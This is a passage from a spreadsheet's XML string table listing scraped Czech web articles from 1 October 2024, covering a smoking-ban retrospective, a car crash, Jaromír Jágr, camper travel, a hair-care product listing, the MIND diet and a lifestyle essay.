čtenář Blesku Nahý chlapeček (4) skotačí na parapetu domu v Ostravě , hází i hračky Benton County Sherrif's Office ČTK / AP / Stephanie Matat Rodiče se své dítě pokusili prodat za tisíc dolarů, když se to nepovedlo, svěřili ho cizímu muži za šest plechovek piva . Matka Shalene Ehlersová Otec Darien Urban Florida - Ilustrační foto Autor: kjm Autor person kjm Rubrika transition_slide Krimi</t>
  </si>
  <si>
    <t>2070</t>
  </si>
  <si>
    <t>942000</t>
  </si>
  <si>
    <t>20241001_47_2997042456_57569d3662b3195d7202.html</t>
  </si>
  <si>
    <t>57569d3662b3195d7202</t>
  </si>
  <si>
    <t>467160</t>
  </si>
  <si>
    <t>503190</t>
  </si>
  <si>
    <t>20241001_48_2997033869_d7ac5ab76a349134ffe5.html</t>
  </si>
  <si>
    <t>d7ac5ab76a349134ffe5</t>
  </si>
  <si>
    <t>Před 10 lety: Restauratéři v Prostějově se chystají na zákaz kouření</t>
  </si>
  <si>
    <t>Před 10 lety: Restauratéři v Prostějově se chystají na zákaz kouření 1. říjen 2024 Zobrazení: 406 Nový protikuřácký zákon počítá se zákazem kouření ve všech restauracích, hospodách, barech i na diskotékách. Zákaz chce prosadit nejen ministr zdravotnictví Svatopluk Němeček ( ČSSD ), ale i poslanci hnutí ANO. V platnost by nový zákon mohl vstoupit už začátkem roku 2016. Někteří provozovatelé prostějovských restaurací jej vítají, najdou se však i jeho tvrdí odpůrci. Pokud by byl schválen úplný zákaz kouření, nejvíce by se to zřejmě dotklo klasických pivnic. Jejich majitelé si něco takového vůbec neumí představit. „Jestli ti pitomci prosadí úplný zákaz kouření, tak nás zlikvidují. Dokážete si představit chlapa na pivu bez cigarety? To raději všichni budou kouřit doma v obýváku s lahváčem v ruce. Něco takového by byl konec všech hospod,” rozohnila se provozovatelka Hospody U Boženky v Olomoucké ulici. Právě pivnic by se nový protikuřácký zákon ovšem dotknout nemusel. Platit má totiž v zařízeních, kde se podává jídlo. „Úbytek zákazníků by byl určitě větší v pivnicích či v barech než v restauracích, kde se vaří. Těch by se zas tolik negativně dotknout nemusel,” prohlásil Jan Belo, který provozuje Bar Plzeňka v Krasicích i restauraci Beseda na prostějovském Žižkově náměstí. Hostinští upozorňují, že ve vnímání zákazu kouření v restauracích došlo za poslední dobu k výraznému posunu. „Před takovými deseti lety bych si něco podobného nedokázal absolutně představit, teď už s tím nemám problém. Zákaz kouření v restauracích, kde se podává jídlo, bych klidně zavedl hned,” potvrdil Luděk Chmela, provozovatel restaurace U Chmelů. Podobně mluvila i řada dalších. Někteří si však uvědomují i možné komplikace. „Hosté si půjdou zapálit ven, budeme muset vymyslet, jak to udělat, aby nám třeba neutíkali bez placení,” upozornil Marcel Pilka z restaurace Fiesta. S úplným zákazem kouření nejen v restauracích, ale na všech veřejných místech přišlo z evropských zemí jako první Irsko , kde to platí od roku 2004. Poté s různými úpravami následovaly další státy. V restauracích se tak už nesmí kouřit ve Francii , Velké Británii , Bulharsku , Španělsku , Itálii , Řecku , Bosně a Hercegovině , Černé Hoře , Makedonii , Finsku , na Islandu , v Litvě , Nizozemsku , Norsku , Portugalsku , ve Švédsku , na Ukrajině i ve Vatikánu . AKTUÁLNÍ KOMENTÁŘ Zákaz kouření ve všech restauracích, o kterém se před deseti lety diskutovalo snad na každém roku, skutečně záhy nato zákonodárci schválili. Kuřáci tento nový zákon vesměs respektovali. Prostě si od piva nebo kávičky v kavárně odskočili před provozovnu a zapálili si venku. No a co? I když v prvních měsících platnosti zákazu kouření ve všech restauračních či pohostinských provozovnách a kavárnách kuřáci brblali a jen těžko si zvykali, dnes to už každý bere jako naprostou samozřejmost. Není snad nikdo, komu by bylo zatěžko vyjít s cigaretou ven a tam si pokuřovat, jak chce. Především jde samozřejmě o zdraví, ale zákaz kouření uvnitř hospod má i další obrovskou výhodu. Nikomu už po příchodu domů není cítit oblečení jako za starých časů, kdy uvnitř pro oblaka dýmu nebylo vidět... Anketa Zasáhla vás povodeň na vlastní kůži? Ano (356) Jste zde: Prostějovský Večerník Speciály Před 10 lety: Restauratéři v Prostějově se chystají na zákaz kouření Copyright © 2004 - 2024 Prostějovský Večerník (Haná Press s.r.o.). Všechna práva vyhrazena. | Vytvořil: Joomla weby. HLAVNÍ NABÍDKA Autor: Alena Fojtová Autor person Alena Fojtová</t>
  </si>
  <si>
    <t>2830</t>
  </si>
  <si>
    <t>1470</t>
  </si>
  <si>
    <t>20241001_49_2997035167_e784e8ae108a1f5036d1.html</t>
  </si>
  <si>
    <t>e784e8ae108a1f5036d1</t>
  </si>
  <si>
    <t>Hromadná nehoda u Třebíče: Řidička za volantem Škody Citigo poničila tři stojící auta</t>
  </si>
  <si>
    <t>Hromadná nehoda u Třebíče : Řidička za volantem Škody Citigo poničila tři stojící auta Nehodou, ke které došlo v pondělí po třetí hodině odpoledne, vyšetřují třebíčští policisté. Na silnici I/23 byla hned čtyři havarovaná auta, paradoxně tři z nich před nárazem stála. Havárii způsobila třiačtyřicetiletá řidička za volantem Škody Citigo, která jela od Vladislavi . „V protisměru se střetla se stojícím automobilem Škoda Rapid, následně pokračovala v jízdě a narazila ještě do dalšího stojícího vozidla Škoda Octavia. Poté došlo ještě ke střetu přední části vozidla Škoda Citigo s dalším stojícím vozidlem Fiat Ducato. Po nárazu byly automobily Škoda Citigo i Fiat odhozeny do silničního příkopu,“ uvedla policejní mluvčí Jana Kroutilová . Řidička i její spolucestující se při nehodě zranili a museli být transportováni do třebíčské nemocnice. Alkohol nehrál při havárii žádnou roli. „Při dopravní nehodě vznikla předběžně vyčíslená škoda za 330 tisíc korun,“ dodala mluvčí s tím, že dopravní nehodu policisté šetří. Autor: external Rubrika transition_slide Krimi</t>
  </si>
  <si>
    <t>18110</t>
  </si>
  <si>
    <t>13050</t>
  </si>
  <si>
    <t>20241001_5_2998360937_dfd258161a8f6a6478c2.html</t>
  </si>
  <si>
    <t>dfd258161a8f6a6478c2</t>
  </si>
  <si>
    <t>Jágr konečně prozradil svůj recept na sportovní dlouhověkost</t>
  </si>
  <si>
    <t>Jágr konečně prozradil svůj recept na sportovní dlouhověkost Jaromír Jágr , noshp, Pittsburgh Penguins Jaromíra Jágra letos čeká poslední sezona v kariéře. Je to poprvé, co veřejně oznámil, že už opravdu pověsí brusle na hřebík. V létě na sobě neskutečně makal, angažoval kondičního trenéra a zhubl deset kilo. Několik tréninků absolvoval s našimi dvěma nejlepšími hráči současnosti, s Davidem Pastrňákem a Romanem Červenkou . Při jednom ze srpnových tréninků si sice lehce natrhl stehenní sval a musel si dát pár týdnů pauzu, přesto stihl naskočit do prvního zápasu sezony. A ve druhém utkání dal dokonce gól proti Spartě a pomohl jí tak skolit 4:2. Nastupuje zpravidla ve třetí lajně a průměrně odehraje kolem 13 minut. To by mu mohl závidět kdejaký čtyřicátník a Jágrovi přitom bude v únoru 53 let! A jaký je tedy jeho recept na dlouhověkost? Být pozitivní, snažit se brát každou těžkou situaci s nadhledem a hlavně se co nejvíce smát. Tenhle přístup k životu a tím pádem i ke sportovní kariéře si Jágr převzal od největších hokejových velkánů. „Když měl blbý den Mario (Lemieux), pořád dokázal najít způsob, jak dávat góly. A nemusely být hezké, stačila nějaká dorážka. Gretzky to samé. V životě to funguje stejně. Když se věci nevyvíjejí tím správným směrem, musíš hledat způsob a usmívat se. Protože smíchem získáváš pozitivní energii, “ říká svůj recept hráč, který v NHL sehrál a nasbíral 1921 bodů. Poslední extraligový ročník odehrál olympijský šampion, dvojnásobný mistr světa a dvojnásobný vítěz Stanleyova poháru v kladenském dresu v sezoně 2021/22. Pak už následující sezony byly kvůli zraněné hodně rozkouskované. Často se i stávalo, že Jágr začal pořádně trénovat až v září a říjnu, a tak vstupoval do sezony až v předvánočním čase. Samozřejmě jenom se od rána do večera smát, to by nestačilo sebetalentovanějšímu sportovci. Kromě tvrdého tréninku a dokonalé regeneraci je důležité se zaměřit i na správnou stravu. Jágr začal jíst více ryb a též bezlepkových potravin. Ze svého jídelníčku musel definitivně vyškrtnout oblíbené tatranky, maminčinu bábovku i colu. Možná se to neví, ale Jágr nikdy v životě nepil alkohol , což je pro každého druhého hokejistu, ale i fotbalistu, asi naprosto nepředstavitelné. Když slavná 68 oznamovala ve čtyřiceti letech, že v padesáti ještě bude hrát, většina se tomu upřímně zasmála. Ale ono se tak opravdu stalo. A nebýt starostí s hledáním sponzorů pro Kladno , mohl se rodák z Hnidous u Kladna více věnovat tréninku a odehrál by toho v extralize více. Avšak absence tréninků zákonitě přinášela i častá zranění. Ještě v 45 letech získával v NHL ve floridském dresu velmi slušná čísla. Jen čtyři body mu v sezoně 2016/17 scházely k solidní padesátibodové hranici. Po čtyřicítce už samozřejmě nepatřil k lídrům kanadské bodování, ale pořád si udržoval kvalitní výkonnost a navíc se stal jakýmsi mentorem mladých hráčů. Takto např. na Floridě „vychoval“ Aleksandera Barkova a Jonathana Huberdaeua. Teď je ale pro Jágra hlavním cílem vyhnout se s „Poldovkou“ baráži a nejlépe se po 12 (!) letech dostat do vysněného play-off. To by se to pak nejlepšímu českému hokejistovi v historii s radostí věšely brusle na hřebík. Anebo by si to třeba ještě ještě rozmyslel, když by viděl, cítil, že mu to ještě jde a dokáže na ledě prohánět protihráče o třicet let mladší. Stejně pravděpodobný však může být i jeho odchod z Kladna , dokonce přímo z Česka . Prý se nabízí manažerská práce v Pittsburgu , kde se před 35 lety rozjela naplno jeho hvězdná kariéra. Tento klub z Pensylvanie je po kladenském klubu Jágrova srdcovka, i když bylo období, kdy fanoušci „Tučňáků“ pálili jeho dresy, protože přestoupil k jejich úhlavním nepřítelům do Philadelphie . K definitivnmu udobření došlo letos v únoru, kdyby byl dres s číslem 68 slavnostně vyvěšen v pittsburgské aréně za dohledu dojatého Jágra . [seznam-ads id="31896"] [seznam-ads id="31898"] [seznam-ads id="36416"] [seznam-ads id="32011"]</t>
  </si>
  <si>
    <t>2180</t>
  </si>
  <si>
    <t>13340</t>
  </si>
  <si>
    <t>20241001_50_2997331741_65c54714cf3931c6d63c.html</t>
  </si>
  <si>
    <t>65c54714cf3931c6d63c</t>
  </si>
  <si>
    <t>Objevujte krásy České republiky na čtyřech kolech s obytným autem</t>
  </si>
  <si>
    <t>Objevujte krásy České republiky na čtyřech kolech s obytným autem 01.10.2024 Redakce Zažít svobodu cestování a spojit ji s dobrodružstvím je snem mnoha karavanistů. Česká republika , s jejími malebnými kouty a pestrými krásami, nabízí doslova nekonečné možnosti pro objevování, a to jak přírodních skvostů, tak kulturních památek. Plánujete-li dobrodružnou cestu, můžete si být jisti, že s obytným autem se dostanete k místům, která mnozí návštěvníci míjejí. Pokud toužíte po nezapomenutelném zážitku, můžete se vypravit na Jesenicko. Tato oblast skýtá ohromující přírodní scenérie, čistý vzduch a je domovem mnoha turistických stezek. Zajímavostí, o které mnozí netuší, je, že Jeseníky jsou domovem nejvyšší hory Moravy – Pradědu , jehož vrchol dosahuje výšky 1491 metrů. V jeho okolí najdete různé stezky, které vás zavedou k malebným horským chatám. Celoročně přístupné stezky nabízejí nejen výhledy na zasněžené svahy v zimě, ale i na rozkvetlé horské louky v létě. Romantické výlety do podhůří Krkonoš Za druhým tipem se vydejte do podhůří Krkonoš . Tento region je známý svými hlubokými lesy, křišťálově čistými řekami a malebnými vesničkami. Obytné auto tady poskytuje ideální způsob, jak prozkoumat místní krásy. Zajímavostí je, že díky jedinečnému mikroklimatu se ve Vysokém nad Jizerou nachází raritní druhy rostlin, které jinde v České republice nenajdete. Ať už zvolíte procházku po zrekonstruované trase kolem přehrady Mumlava nebo se vydáte na celodenní trek k Labské boudě, nezapomeňte si udělat čas na zastávky v místních hospůdkách, kde ochutnáte regionální speciality. Díky příznivým podmínkám pro karavanisty je zde také řada kempů, které nabízejí komfortní zázemí. Mnohé z nich mají možnost připojení k elektrice, sociální zařízení a dokonce i možnosti k zapůjčení různých rekreačních potřeb. Strávený čas v přírodě vám umožní zcela se odpojit od každodenních starostí a užít si v klidu kouzlo Krkonoš . Cyklo výlety podél Moravské vinné stezky Pokud máte rádi cyklistiku, Moravská vinná stezka je pro vás to pravé místo. Éterické vinice, malebné vesnice a příjemní vinaři, kteří se s vámi podělí o své znalosti o místních vínech, činí tuto oblast jedinečnou. Obytné auto zde nabízí mobilní základnu, se kterou se můžete jednoduše přesouvat mezi vinařstvími a užívat si cyklistických výletů. Dále fascinující je, že Morava se pyšní více než 14 000 hektary vinic, což ji řadí mezi nejvýznamnější vinařské oblasti v zemi. Během cyklovýlety máte možnost ochutnat místní vína a nechat se unést kulinářskými specialitami, jako jsou moravské koláče nebo pečené masové speciality. Trasa je přitom výborně značená, díky čemuž si můžete naplánovat, které vinařství navštívíte. Obytné auto vám dává svobodu zůstat déle v místech, která vás okouzlí. Krása cestování s obytným autem spočívá v jeho flexibilitě a možnosti objevovat nepoznané. Česká republika je zemí, která nabízí skvělé trasy a neomezené množství zážitků, a to vše na dosah ruky. Přírodní krásy, kulturu a gastronomii budete moci poznávat z pohodlí svého obytného vozu a přitom vychutnávat svobodu, kterou tento způsob cestování přináší. Autor: Redakce</t>
  </si>
  <si>
    <t>20241001_51_3724659017_d0a3b8f7adab75485725.html</t>
  </si>
  <si>
    <t>d0a3b8f7adab75485725</t>
  </si>
  <si>
    <t>Dárková sada pro suché vlasy Paul Mitchell Clean Beauty Hydrate - Paul Mitchell</t>
  </si>
  <si>
    <t>Dárková sada pro suché vlasy Paul Mitchell Clean Beauty Hydrate - Paul Mitchell Popis Varianty 18 Značka Dárková sada pro suché vlasy Paul Mitchell Clean Beauty Hydrate: Hydratační šampon pro suché vlasy Paul Mitchell Clean Beauty Hydrate - 50 ml Hydratační péče pro suché vlasy Paul Mitchell Clean Beauty Hydrate - 50 ml Stylingové sérum pro objem jemných vlasů Paul Mitchell Clean Beauty Volumizing Liquid - 100 ml Hydratační šampon pro suché vlasy Paul Mitchell Clean Beauty Hydrate - 50 ml Hydratační šampon Paul Mitchell Clean Beauty Hydrate je určen pro suché a křehké vlasy v důsledku poškození životním prostředí nebo používáním stylingových nástrojů. Obsahuje olivy a ovesné peptidy, které dodávají hydrataci, vyživují a zklidňují pokožku hlavy. Jemná receptura čistí a vyživuje suché vlasy. Vhodný i pro jemné vlasy, které svým složením nezatíží a dodá jim potřebnou hydrataci a vláčnost. Podpoří zářivost a stálost barvy. Řada Clean Beauty je veganská péče o vlasy, netestována na zvířatech, vyrobená z organických rostlinných složek, bez parabenů, sulfátů, ftalátu, minerálních olejů a alkoholu . Balení: 50 ml Technologie a aktivní látky: Olivy - pomáhají udržet vlasy zdravé a chránit je před poškozením. Vyživují, pečují a znatelně tak zlepšují vzhled a omak vlasů. Ovesné peptidy - pomáhají hydratovat a chránit díky nezatěžující bariéře na vlasech. Opravují poškozené vlasy a zanechávají je jemné a lesklé. Vlastnosti: - pro suché vlasy - pro křehké vlasy - hydratuje - vyživuje - zklidňuje pokožku hlavy - obsahuje olivy - obsahuje ovesné peptidy - 78 % přírodních látek - jemné a lesklé vlasy - veganský - měkčí a silnější vlasy - 100% recyklovatelný obal - netestováno na zvířatech Aplikace: 1. Naneste na mokré vlasy. 2. Jemnými pohyby prstů vmasírujte do vlasů. 3. Šampon napěňte. 4. Vlasy důkladně opláchněte. 5. Vlasy usušte a vytvořte požadovaný styling. Hydratační péče pro suché vlasy Paul Mitchell Clean Beauty Hydrate - 50 ml Hydratační péče Paul Mitchell Clean Beauty Hydrate je ideální pro suché a žíznivé vlasy. Obsahuje olivy a ovesné peptidy, které udržují zdraví vlasů, chrání je před poškozením a zklidňují pokožku hlavy. Jeho ojedinělá receptura intenzivně hydratuje a obnovuje vyprahlé prameny, přináší jim měkkost a lesk. Jako bonus Vaše vlasy budou zářivě lesklé. Vhodný i pro jemné vlasy, které svým složením nezatíží a dodá jim potřebnou hydrataci a vláčnost. Podpoří zářivost a stálost barvy. Řada Clean Beauty je veganská péče o vlasy, netestována na zvířatech, vyrobená z organických rostlinných složek, bez parabenů, sulfátů, ftalátu, minerálních olejů a alkoholu . Balení: 50 ml Technologie a aktivní látky: Olivy - pomáhají udržet vlasy zdravé a chránit je před poškozením. Vyživují, pečují a znatelně tak zlepšují vzhled a omak vlasů. Ovesné peptidy - pomáhají hydratovat a chránit díky nezatěžující bariéře na vlasech. Opravují poškozené vlasy a zanechávají je jemné a lesklé. Vlastnosti: - pro suché vlasy - pro žíznivé vlasy - hydratuje - vyživuje - zklidňuje pokožku hlavy - obsahuje olivy - obsahuje ovesné peptidy - 92 % přírodních látek - jemné a lesklé vlasy - veganský - měkčí a silnější vlasy - 100% recyklovatelný obal - netestováno na zvířatech Aplikace: 1. Naneste na ručníkem vysušené vlasy. 2. Jemně vmasírujte malé množství. 3. Důkladně opláchněte. Pro hloubkovou hydrataci nechte působit ve vlasech 3-5 minut, čímž dosáhnete okamžitého výsledku, jako při použití masky. Stylingové sérum pro objem jemných vlasů Paul Mitchell Clean Beauty Volumizing Liquid - 100 ml Stylingové sérum Paul Mitchell Clean Beauty Volumizing Liquid dodává extra objem a tvárnou fixaci jemným vlasům a je ideální pro použití před foukanou. Vlasy jsou po použití séra lesklé a pružné. Kyselina ferulová chrání vlasy před UV zářením, zabraňuje poškození vlasového vlákna a vypadávání vlasů. Díky obsahu lněného semínka budou Vaše vlasy zdravé a lesklé. Sérum obsahuje 84 % přírodních ingrediencí. Řada Clean Beauty je veganská péče o vlasy, netestována na zvířatech, vyrobená z organických rostlinných složek, bez parabenů, sulfátů, ftalátu, minerálních olejů a alkoholu . Balení: 100 ml Aktivní látky a technologie: Kyselina ferulová - chrání vlasy před UV zářením, zabraňuje poškození vlasového vlákna, vypadávání vlasů a předčasnému šedivění vlasů Lněné semínko - vlasy vyživuje a revitalizuje, dodává jim zdraví a lesk Vlastnosti: - stylingové sérum - dodává extra objem a tvárnou fixaci - vyživuje a chrání vlasy - vlasy jsou hladké, zacelené a hebké - 84 % přírodních ingrediencí - veganský - netestováno na zvířatech - 100% recyklovatelný obal Aplikace: 1. Naneste na ručníkem vysušené vlasy. 2. Vyfoukejte do požadovaného účesu. Typ: dárková cestovní sada - šampon + kondicionér + krém − 703954 Skladem posledních 16 ks 799,- Kč Sleva 28 % Typ: dárková cestovní sada - sérum pro objem + šampon + péče − 121924 Skladem poslední 1 ks 725,- Kč Sleva 19 % Typ: dárková sada - šampon + kondicionér Skladem posledních 16 ks 1.329,- Kč Typ: péče - 1000 ml − 121124 Skladem 2 ks Typ: péče - 250 ml − 121122 Skladem 3 ks 929,- Kč Typ: péče - 50 ml − 121120 Skladem 8 ks 289,- Kč Typ: péče - 7,4 ml − 121129 Skladem 18 ks 28,- Kč Typ: šampon - 1000 ml − 121014 Skladem 2 ks Typ: šampon - 250 ml − 121012 Skladem 3 ks 839,- Kč Typ: šampon - 50 ml − 121010 Skladem 2 ks 285,- Kč Typ: šampon - 7,4 ml − 121019 Na cestě ( očekáváme 31.01. ) 28,- Kč Typ: dárková cestovní sada - šampon + kondicionér + krém − 703954 Skladem posledních 16 ks 799,- Kč Sleva 28 % Typ: dárková cestovní sada - šampon + péče + stylingový krém − 121926 Skladem poslední 3 ks 740,- Kč Sleva 28 % Typ: dárková cestovní sada - sérum pro objem + šampon + péče − 121924 Skladem poslední 1 ks 725,- Kč Sleva 19 % Typ: sérum pro objem jemných vlasů - 100 ml − 121321 Skladem 2 ks 835,- Kč Typ: stylingový krém - 100 ml − 121301 Skladem 2 ks 835,- Kč Typ: stylingový krém - 7,4 ml − 121309 Skladem 20 a více ks 28,- Kč Typ: termoochranný sprej - 150 ml − 121311 Skladem 5 ks 835,- Kč Značka Paul Mitchell Paul Mitchell je značka profesionální vlasové kosmetiky a vlasových pomůcek známá po celém světě. Roku 1980 ji založili dva kamarádi Paul Mitchell a John Paul DeJoria, kteří si přáli podporovat úspěch kadeřníků a nabídnout luxusní vlasovou péči za dostupné ceny. Značka je průkopníkem kosmetických produktů, které se netestují na zvířatech. Také se angažuje do ekologických kampaní za ochranu životního prostředí. Prvotřídní přípravky jsou založené výhradně na přírodní bázi, obsahují např. tea tree, marulový olej či divoký zázvor. Profesionální vlasová kosmetika Paul Mitchell je ideální volbou do kadeřnických salonů i na domácí použití. V naší široké škále produktů si najdete perfektní přípravky Paul Mitchell vhodné pro váš typ vlasů – od šamponu až po žehličku na vlasy. Dopřejte svým vlasům výjimečnou péči exkluzivní kosmetiky Paul Mitchell a poznejte, jaké to je mít nádhernou zdravou hřívu plnou lesku a sametové hebkosti. 333,- Kč</t>
  </si>
  <si>
    <t>4350</t>
  </si>
  <si>
    <t>5060</t>
  </si>
  <si>
    <t>20241001_52_2996738506_eb8810278dad810fb523.html</t>
  </si>
  <si>
    <t>eb8810278dad810fb523</t>
  </si>
  <si>
    <t>Žádné zákazy, doporučená sklenka vína a hodně ryb. Nová dieta tvrdí, že zná recept na ochranu mozku i paměti Michaela Kubečková Ryby, zejména tučné druhy jako losos, sardinky, pstruh, tuňák a makrela, by se měly jíst alespoň jednou týdně kvůli vysokému obsahu omega-3 mastných kyselin. Autor ▪ pixabay.com I nternet a sociální sítě jsou plné nových diet, které mají zajistit rychlý úbytek kil nebo zdravější život. Posledním velkým hitem po přerušovaném půstu a keto dietách byla dieta DASH, která byla speciálně vyvinutá ke snížení krevního tlaku. Skupina neurologů nyní odhalila, že spojení této diety a středomořské stravy také chrání mozek a celkově paměť. Co je základem této stravy? Nějakou poruchou mozku trpí každý pátý člověk ve věku nad 65 let. I proto se světové výzkumné týmy zaměřují na to, jak mozek před degenerací ochránit. Dieta DASH , která zabraňuje vysokému krevnímu tlaku, v kombinaci se středomořskou stravou může být jedním z takových „štítů“. Odborníci ji nazvali MIND a důraz kladou hlavně na pestrost stravy, pravidelnou konzumaci různých druhů zeleniny, ovoce a bílkovin. „Mezi 10 hlavních potravinových skupin zdravých pro mozek patří listová zelenina, zelenina obecně, ořechy, bobule, celozrnné potraviny, mořské plody, drůbež, luštěniny, olivový olej a víno v omezeném množství,“ uvedl autor studie Dr. Russell Sawyer pro časopis Newsweek . A jmenuje dalších pět nezdravých potravinových skupin, které mozku neprospívají – červené maso, máslo a tvrdý margarín, sýry , pečivo a sladkosti a smažená, rychlá jídla. Dieta se ale podle Sawyera víc zaměřuje na to, co byste měli jíst, a méně na to, co byste neměli konzumovat vůbec. „Jako někdo, kdo má rád jídlo, bych raději do své stravy přidal salát s ořechy, bobulovým ovocem, fazolemi a dresinkem na bázi olivového oleje, než abych musel přísně omezit to, co nesmím jíst,“ říká Sawyer, působící na katedře neurologie a rehabilitační medicíny na Lékařské fakultě University of Cincinnati. Specialista na preventivní a životní stylovou medicínu Dr. David Katz dietu pro CNN pochválil. „Klade důraz na skutečné potraviny, především ty rostlinné, potřebné ke snížení systémového zánětu, podpoře hubnutí, zlepšení zdraví mikrobiomu, zmírnění inzulinové rezistence, snížení hladiny tuků v krvi a zpomalení zanášení tepen.“ Jak by měl jídelníček podle MIND diety vypadat Alespoň šestkrát týdně by měly být základem jídla zelené listové zeleniny, jako je kapusta, špenát a různé saláty. Kromě toho by se měla denně konzumovat i jiná zelenina, přednostně neškrobová, tedy cukety, okurky, brokolice, cibule nebo česnek. Bobulové ovoce, jako jsou jahody, borůvky, maliny a ostružiny, by mělo být kvůli antioxidačním účinkům na jídelníčku minimálně dvakrát týdně. I pětkrát týdně by se pak měly zařadit ořechy, přičemž je vhodné střídat různé druhy. Ořechy jsou ale kvůli vysokému obsahu tuku kalorické, a proto se obecně doporučuje jejich konzumaci omezit na jednu hrst. Dále jsou doporučovány celozrnné potraviny, které by měly být konzumovány alespoň třikrát denně kvůli obsahu vlákniny. Ryby, zejména tučné druhy jako losos, sardinky, pstruh, tuňák a makrela, by se měly jíst alespoň jednou týdně kvůli vysokému obsahu omega-3 mastných kyselin. Luštěniny, včetně všech druhů fazolí, čočky a sóji, by měly být součástí alespoň čtyř jídel týdně, protože jsou bohaté na bílkoviny a vlákninu. Co se týče nápojů, MIND dieta doporučuje maximálně jednu sklenku vína denně, ať už červeného, nebo bílého. Drůbež, konkrétně kuře nebo krůta, by se měla konzumovat minimálně dvakrát týdně jako zdroj bílkovin. Je však důležité vyhnout se smaženému kuřeti. Studie, publikovaná minulou středu v časopise Neurology Americké akademie neurologie, je součástí probíhajícího výzkumu nazvaného Regards . Ten má odpovědět na otázky, proč mají lidé z jižních oblastí USA a lidé černé pleti vyšší výskyt mozkových mrtvic. Od roku 2003 sleduje zhruba 30 tisíc dospělých ve věku 45 let a starších. Více než 14 tisíc účastníků bylo na začátku studie a znovu po 10 letech dotazováno na své stravovací návyky. Podstoupili také EKG , měření krevního tlaku a krevní testy. Výzkumníci pak hodnotili závěry podle toho, jak lidé dodržovali parametry diety MIND. Ti, kteří se jí řídili více, měli o čtyři procenta nižší pravděpodobnost vzniku problémů s pamětí a myšlením než ti, kteří dietu nedodržovali. Tento výsledek zůstal i po zohlednění dalších faktorů, jako je cvičení, vzdělání, kouření, index tělesné hmotnosti, zdravotní stav, věk a úzkost nebo deprese. U žen bylo riziko ještě nižší – měly o šest procent nižší pravděpodobnost vzniku kognitivních poruch. Pokud jde o rychlost mentálního poklesu u těch, kteří již problémy s pamětí a myšlením měli, studie zjistila, že ti, kteří se více drželi MIND, zaznamenali pomalejší pokles než ti, kteří tuto dietu nedodržovali. Nejnovějšími výzkumy v oblasti mentálního zdraví se bude zabývat jeden z panelů na nadcházejícím Health &amp;amp; Longevity Summitu , který 8. října pořádají Hospodářské noviny. Diskutovat na téma bude například neurolog a neurokouč Aleš Stuchlík , který se dlouhodobě věnuje fungováním mozku, paměti, stresu i emocím. Podrobný program celého summitu a vstupenky naleznete na Healthsummit.cz . #dieta #dlouhověkost #zdraví #věda #věda a výzkum Tento článek máte je zdarma. Když si předplatíte HN, budete moci číst všechny naše články nejen na vašem aktuálním připojení . Vaše předplatné brzy skončí. Předplaťte si HN a můžete i nadále číst všechny naše články. Nyní první 2 měsíce jen za 40 Kč. Veškerý obsah HN.cz Možnost kdykoliv zrušit Odemykejte obsah pro přátele Ukládejte si články na později Všechny články v audioverzi + playlist za 40 Kč nebo za 80 Kč Navíc mobilní aplikace a web bez reklam Autor: Michaela Kubečková Autor person Michaela Kubečková Rubrika transition_slide HN</t>
  </si>
  <si>
    <t>90150</t>
  </si>
  <si>
    <t>100630</t>
  </si>
  <si>
    <t>20241001_53_2996656360_3721f80d23705b724a94.html</t>
  </si>
  <si>
    <t>3721f80d23705b724a94</t>
  </si>
  <si>
    <t>Jak se naučit konečně žít naplno, i když jsi v padesáti stále na Tinderu</t>
  </si>
  <si>
    <t>Jak se naučit konečně žít naplno, i když jsi v padesáti stále na Tinderu autor: Redakce Nezdrave.cz | 01.10.2024 | Lifestyl Chlapi, není žádným tajemstvím, že život je jeden velký chaos a o vyšší smysl se snažíme tak nějak poslední čtvrt století. Pak se objeví dni sluníčkového jara, kdy se rozhodneme poslat do prdele stereotypy a užít si plnými doušky to, co nám život nabízí. Ať už se potloukáte ulicemi velkoměsta, zaleháváte na gauči s popcornem a Netflixem, nebo s vášní objevujete tajné podniky v zapadlých uličkách, vězte, že konečně je čas na to, abychom si svoje životy vzali do vlastních rukou a začali je prožívat naplno. Začít s malými kroky? Ne, děkuji! Podívejte se. Můžeme se tu bavit o tom, jak je důležité začínat pomalu a s rozmyslem, ale koho to baví? Proč nevyrazit na cestu rovnou na plný plyn? Pro mnohé z nás, zejména těch, co se narodili při zvuku kytar a zvonění telefonů na začátku osmdesátých let, je ideální model tady a teď. Jen si představte – nový bar ve vašem oblíbeném městě, kam se dává na stůl víc než jen chlast , ale také zábava a skvělé talíře. A ano, dostanete se tam správně, takže si dejte pivo a objednejte něco, co váš kuchař nezná z názvu ani slova „třičtvrtě“. Pokud jste někdy slyšeli o efektu zmalomyslnosti, víte, že to, co děláme, je často následek dlouhého vymýšlení a váhání. Zamyslete se, kdy naposledy jste si udělali něco prostě proto, že to zní jako zábava. Nečekejte na další narozeniny, svátky nebo volno. Než vám život spartakiádou připomene, že už to není o šampionátu v hraní videoher, rovnou běžte na bowling, ať už je to metrem nebo na skateboardu. Budete překvapeni, jak jednoduché a osvobozující to může být. Déjavu a zkušenosti: Umění žít bez mapy Znáte ten pocit, kdy strávíte večer v baru s kamarády, vyprávíte si historky a v hloubi duše víte, že ten čas nikdy nenavrátíte? Mnozí z nás se obrací na vzpomínky, ale v dnešním hyperrychlém světě je potřeba žít naplno tady a teď. Práce, kariéra a hypotéka. Ok, beru, je mi jasné, že musíme nějak přežít. Ale pojďme si přiznat, že nikde není napsáno, že se musíme „usadit“ tak rychle. Úspěch a štěstí se totiž nerovná kariérnímu postupu, ale těm malým radostem, které nám používají fantasticky nenápadný úsměv na tváři. Nezapomeňte se občas odmlčet, abyste mohli zažít tu magii okamžiku. Skvělým příkladem je třeba úžasný fakt, že 70 % lidí, kteří vyrazili na dovolenou, si připadají šťastnější než ti, kteří šetřili na úplně nový automobil. Sice se to nezdá jako doba pro honbu za letadly a slaněním, ale co zkusit touhu po žití naplno? To, co nám zbývá, je pořádně se vyřádit – ať už to znamená ochutnávku cizokrajných jídel v pouličních stáncích nebo vulgární tance, při kterých se vaše Instagram story rozkošně rozeběhne na plný výkon. Život je barevný mix Takže, zamyslete se nad tímto: Co cítíte, když jdete do místního supermarketu pro jídlo na večeři? Máte chuť prostě něco vzít a jít domů, nebo už manipuluje váš mozek k plánu na apokalypsu? Nezůstávejte přežít. Upozornění! Pro vás, kdo máte tvrdou tvrdohlavost, existuje způsob, jak vnést trochu života do svých každodenních činů. Například můžete začít s drobnými experimenty. Jaké je to zkusit pečenou červenou řepu místo nudného hovězího vývaru? A co čokoládový fondán na rozloučenou? Život je jedno velké překvapení a kdo říká, že v padesáti už byste neměli při přípravě jídel zkoušet, trochu se mýlí. A 